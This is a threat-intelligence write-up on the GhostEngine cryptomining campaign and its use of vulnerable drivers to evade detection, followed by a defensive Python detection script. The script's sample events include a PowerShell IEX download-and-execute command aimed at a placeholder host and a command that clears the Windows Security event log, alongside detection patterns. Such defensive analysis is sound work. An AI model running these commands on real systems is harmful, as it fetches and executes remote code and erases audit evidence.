2024-05-30

New Crypto Mining Menace GhostEngine Uses Vulnerable Drivers to Evade Detection

Level: Tactical | Source: Elastic | Global


An intrusion set tracked as 'REF4578' has been identified deploying a malicious payload known as GhostEngine to mine cryptocurrency with XMRig. The discovery, made by researchers from Elastic Security Labs and Antiy, is notable for the strategy of loading vulnerable drivers to disable security defenses. The campaign opportunistically targets systems that lack regular monitoring or updates; neither report details geographic or industry targeting. The campaign is active: the example intrusion cited in Elastic Security's analysis occurred on May 6, 2024.

The intrusion begins with the execution of 'Tiworker.exe', a file masquerading as a legitimate Windows component. It launches the command prompt (cmd.exe /c), which in turn invokes PowerShell with IEX (Invoke-Expression) to download what appears to be a PNG file. That file is in fact a PowerShell script named 'get.png', the primary loader for the GhostEngine malware. Elastic researchers observed that GhostEngine's main purpose is to prepare the system for uninterrupted crypto mining. It first clears out any remnants of previous infections and adjusts system configuration to weaken security defenses. Notably, it deletes specific files and scheduled tasks, including Microsoft Assist Job, System Help Center Job, SystemFlushDns, and SystemFlashDnsSrv. GhostEngine then disables critical Windows Defender features and clears numerous Windows event log channels, including Application, Security, Setup, and System, to cover its tracks.

To ensure persistence, GhostEngine creates scheduled tasks such as 'OneDriveCloudSync', which runs every 20 minutes using msdtc, along with other tasks that continuously download and execute malicious scripts. It also terminates processes such as curl.exe so that the operation runs without competition from any previous infections. To support this, it loads vulnerable drivers: those observed include aswArPots.sys (an Avast driver) to terminate processes and IObitUnlockers.sys to disable EDR software, improving its stealth and evasion capabilities. "Once the vulnerable drivers are loaded, detection opportunities decrease significantly, and organizations must find compromised endpoints that stop transmitting logs to their SIEM," Elastic researchers explain.

The GhostEngine campaign is an operation aimed at using infected machines to mine cryptocurrency, primarily Monero, using the XMRig miner. Elastic Security and Antiy reports highlight the campaign's complexity and the importance of monitoring for unusual PowerShell usage, network traffic to known mining pools, and unexpected changes made by vulnerable drivers. Organizations are advised to watch for and block the creation of scheduled tasks and driver manipulations associated with GhostEngine. Additionally, updating and patching systems to close off the vulnerabilities exploited by this campaign is crucial for protection against such threats.
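The detection advice above can be turned into concrete rules. The following is an added example, not code from Elastic, Antiy or Anvilogic: it matches the tradecraft described in this post (cmd.exe spawning PowerShell IEX to fetch a ".png", creation of the named scheduled tasks, event log clearing, and loading of the named vulnerable drivers) against constructed sample events, and flags hosts that have gone quiet, which is the symptom Elastic says remains once the drivers are loaded. The event dictionary shape, host names, timestamps and URL are assumptions.

```python
"""Added example (not Elastic's or Antiy's code): detection logic for the GhostEngine
tradecraft described above, run over constructed sample events. The event dictionaries
are an assumed, simplified shape (Sysmon-like process and driver-load records and a
4698-style scheduled-task record), each carrying a host name and a timestamp."""
import re
from datetime import datetime, timedelta
# Indicators quoted in the write-up, compared case-insensitively.
VULNERABLE_DRIVERS = {"aswarpots.sys", "iobitunlockers.sys"}
SUSPICIOUS_TASKS = {"onedrivecloudsync", "microsoft assist job", "system help center job",
                    "systemflushdns", "systemflashdnssrv"}
LOG_CLEAR_RE = re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b|clear-eventlog", re.I)
IEX_DOWNLOAD_RE = re.compile(r"\b(iex|invoke-expression)\b.*(downloadstring|\.png\b)", re.I)

def classify(event: dict) -> list:
    """Return the name of every rule the event matches (empty list = no alert)."""
    hits, kind, cmd = [], event.get("type"), event.get("command_line", "")
    if kind == "process_create":
        if event.get("parent_image", "").lower().endswith("cmd.exe") and IEX_DOWNLOAD_RE.search(cmd):
            hits.append("cmd_spawns_powershell_iex_download")   # cmd.exe /c -> IEX loader fetch
        if LOG_CLEAR_RE.search(cmd):                             # event log channels wiped
            hits.append("event_log_cleared")
    elif kind == "driver_load":
        if event.get("image", "").rsplit("\\", 1)[-1].lower() in VULNERABLE_DRIVERS:
            hits.append("known_vulnerable_driver_loaded")
    elif kind == "task_create":
        if event.get("task_name", "").strip("\\").lower() in SUSPICIOUS_TASKS:
            hits.append("ghostengine_scheduled_task")
    return hits

def silent_hosts(events: list, now: datetime, max_gap: timedelta) -> set:
    """Hosts whose newest event is older than max_gap: an endpoint that stops
    shipping logs is the symptom Elastic says remains once the drivers load."""
    last_seen = {}
    for e in events:
        last_seen[e["host"]] = max(last_seen.get(e["host"], e["ts"]), e["ts"])
    return {h for h, ts in last_seen.items() if now - ts > max_gap}

# Constructed sample telemetry (not real logs); the URL is a placeholder.
T0 = datetime(2024, 5, 6, 9, 0)
CMD = "C:\\Windows\\System32\\cmd.exe"
SAMPLE_EVENTS = [
    {"host": "ws1", "ts": T0, "type": "process_create", "parent_image": CMD,
     "command_line": "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/get.png')"},
    {"host": "ws1", "ts": T0 + timedelta(minutes=1), "type": "task_create", "task_name": "\\OneDriveCloudSync"},
    {"host": "ws1", "ts": T0 + timedelta(minutes=2), "type": "process_create", "parent_image": CMD,
     "command_line": "wevtutil cl Security"},
    {"host": "ws1", "ts": T0 + timedelta(minutes=3), "type": "driver_load", "image": "C:\\Windows\\Temp\\aswArPots.sys"},
    {"host": "ws2", "ts": T0 + timedelta(hours=3), "type": "process_create", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "notepad.exe"},
]
```

Running `classify` over `SAMPLE_EVENTS` flags the four ws1 events and nothing on ws2; `silent_hosts(SAMPLE_EVENTS, T0 + timedelta(hours=3, minutes=10), timedelta(hours=1))` then reports ws1 as a host that has stopped sending logs.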
